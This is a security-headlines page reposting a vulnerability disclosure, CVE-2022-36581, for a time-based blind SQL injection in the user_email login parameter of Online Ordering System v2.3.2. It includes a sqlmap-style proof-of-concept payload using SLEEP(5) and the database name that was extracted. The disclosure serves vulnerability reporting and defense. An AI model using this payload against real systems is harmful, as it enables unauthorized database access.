Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-36581: Zerrr0_Vulnerability/SQL-Injection-Vulnerability.md at main · zerrr0/Zerrr0_Vulnerability

Online Ordering System v2.3.2 was discovered to contain a SQL injection vulnerability via the user_email parameter at /admin/login.php.

CVE
Open in Source
#sql#vulnerability#php#auth

Permalink

Online Ordering System By janobe - SQL injection vulnerability

  • Exploit Author: zerrr0

Vendor Homepage

  • https://www.sourcecodester.com/php/12978/online-ordering-system-phpmysqli.html

Description

  • Due to lack of protection, parameter user_email in Online Ordering System By janobe v2.3.2 /admin/login.php can be abused to injection SQL queries to extract information from databases.
  • Vulnerability file: /admin/login.php
  • Parameter: user_email

Proof of Concept (PoC) :

---
Parameter: #1* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: user_email=admin' AND (SELECT 5888 FROM (SELECT(SLEEP(5)))eEFG) AND 'BaRZ'='BaRZ&user_pass=admin&btnLogin=
---
  • current database: multistoredb

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE